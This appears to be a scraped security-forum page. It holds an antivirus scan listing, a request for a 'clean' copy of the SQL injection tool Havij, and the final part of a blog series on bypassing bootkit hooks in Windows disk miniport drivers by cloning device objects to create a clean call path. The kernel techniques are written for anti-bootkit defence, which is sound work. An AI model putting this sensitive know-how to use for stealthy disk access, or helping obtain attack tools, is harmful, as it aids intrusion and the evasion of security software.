Antivirus - Clean VBA32 Antivirus - Clean VIPRE - Clean Zoner AntiVirus - Clean eTrust-Vet - Clean
  12. Please , i need one Havij CLEAN. Va rog am si eu nevoie de o arhiva Clean. Thanks. Va multumesc
  13. XP is a little more complicated than newer systems due to the use of a single driver for both port and miniport; however, getting the original pointers is fairly straight forward depending on how you do it. IRP_MJ_SCSI & DriverStartIo - Method 1 (Windows XP) A common method is to programmatically disassemble the miniport's DriverEntry, looking for the code which initializes the driver's object, then you can extract and calculate the addresses from "mov [esi+30h], offset" and "mov [esi+74h], offset" for DriverStartIo and IRP_MJ_SCSI respectively. The obvious problem with this method is the initialization code may not be in DriverEntry, but a sub function called from it (it may even be necessary to follow jumps). It's also not guaranteed that the instruction will use esi as the pointer to the driver object or an immediate for the function address, in fact you're probably going to have to account for quite a few different instructions. IRP_MJ_SCSI & DriverStartIo - Method 2 (Windows XP) In my tests, it was possible to simply call the DriverEntry of the miniport driver with the parameters from your own driver entry, thus having the miniport set up your driver's object as if it were its own. The only issue with this method is if the driver uses GsDriverEntry (it usually does), the entry point will be invalidated after the driver is initialized, so you cannot call it. To deal with GsDriverEntry you'd first need to load the original image from disk, then search until you reach an unconditional relative jump (this is the offset to real entry point and you can use it to calculate the same address within the loaded driver). IRP_MJ_SCSI (Windows Vista+) On newer systems, things are wonderfully easier: There's no DriverStartIo field and you can initialize all the major functions in your DriverObject with a call to AtaPortInitialize, ScsiPortInitialize, or StorPortInitialize which are all exported from the relevant port drivers (ataport.sys, scsiport.sys, or storport.sys). Bypassing Inline Hooks Although not many bootkits actually perform inline hooking on miniports, it's worth taking care of. You'll need to read a the original miniport or port driver's file into memory, then do a bit of pointer math to calculate the addresses of IRP_MJ_SCSI or DriverStartIo within the clean image. I'm not too sure of the best way to call the clean functions, but here are 2 viable methods to chose from. Trampoline Usually a hook is placed within the first few bytes of a function, so you can simply read and relocate the first few bytes from the clean function into a buffer, then append it with a jump to the same offset within the real driver(this is the same way a hooking engine would call the unhooked version of a function). Manual Mapping A more difficult but effective method is to manually map a clean copy of the driver into memory, then relocate it so that all absolute instructions will reference the real driver, meaning you don't have to worry about initializing any global variables or such. Creating a Clean Call Path Due to the fact a lot of bootkits run persistence threads for replacing any driver object hooks which get removed, you don't want to unhook the real driver but instead create a parallel one, so you can maintain your own hook-free call path. Step 1 (XP & Vista) Get the device object for the boot disk miniport, this is usually \Device\Harddisk0\Dr0 Use the size field of the device object to allocate some non paged memory and copy the entire object (this is your clean miniport). Set the DriverObject field to point to your own driver's object, in which you've set the IRP_MJ_SCSI and DriverStartIo field appropriately (DriverStartIo can be skipped on Vista+). Step 2 (XP Only) Set the DeviceExtension field of your clean miniport device object to point to directly after its device object (DeviceObject + sizeof(DEVICE_OBJECT)). Get the address stored at offset 0x5C into your clean miniport's device extension and check it's valid (this is the address of the corresponding port's device extension). Read the addresses stored at offset 0x0C into the port's device extension (this is the address of the port's device object). Use the size field of the port's device object to allocate some non paged memory and copy the entire object (this is your clean port). Set the DeviceExtension field of your clean port's device object to point to directly after its device object (DeviceObject + sizeof(DEVICE_OBJECT)). Set the DriverObject field of your clean port's device object to point to your own driver's object, in which you've set the IRP_MJ_SCSI field appropriately. Change offset 0x5C into your clean miniport's device extension to contain the address of the clean port's device extension. Set offset 0x0C into the clean port's device extension to contain the address of the clean port's device object. Using the Clean Path You're going to need to build a raw SCSI request which is pretty complicated; however, the Chinese are already a step ahead, so you can look to this example for help (This request can be issued by passing the clean miniport device object and the IRP to IofCallDriver). It's important to note that miniport drivers are PnP, so if you don't create any devices (IoCreateDevice): the driver will be unloaded as soon as DriverEntry returns, if you do: the driver can't be unloaded at all. Although it's not recommended, you can set the driver back to a legacy driver by setting the AddDevice pointer within the driver's extension to 0, allowing the driver to be unloaded normally. Conclusion This concludes my 3 part series, any feedback in the comments would be greatly appreciated and will be taken into consideration when I create a whitepaper version of the series in a few weeks. Other resources of note Debugging TDL4 Subverting Bootkits using the Crash Dump Driver Stack Exposing Bootkits With BIOS Emulation Source
×
×
  • Create New...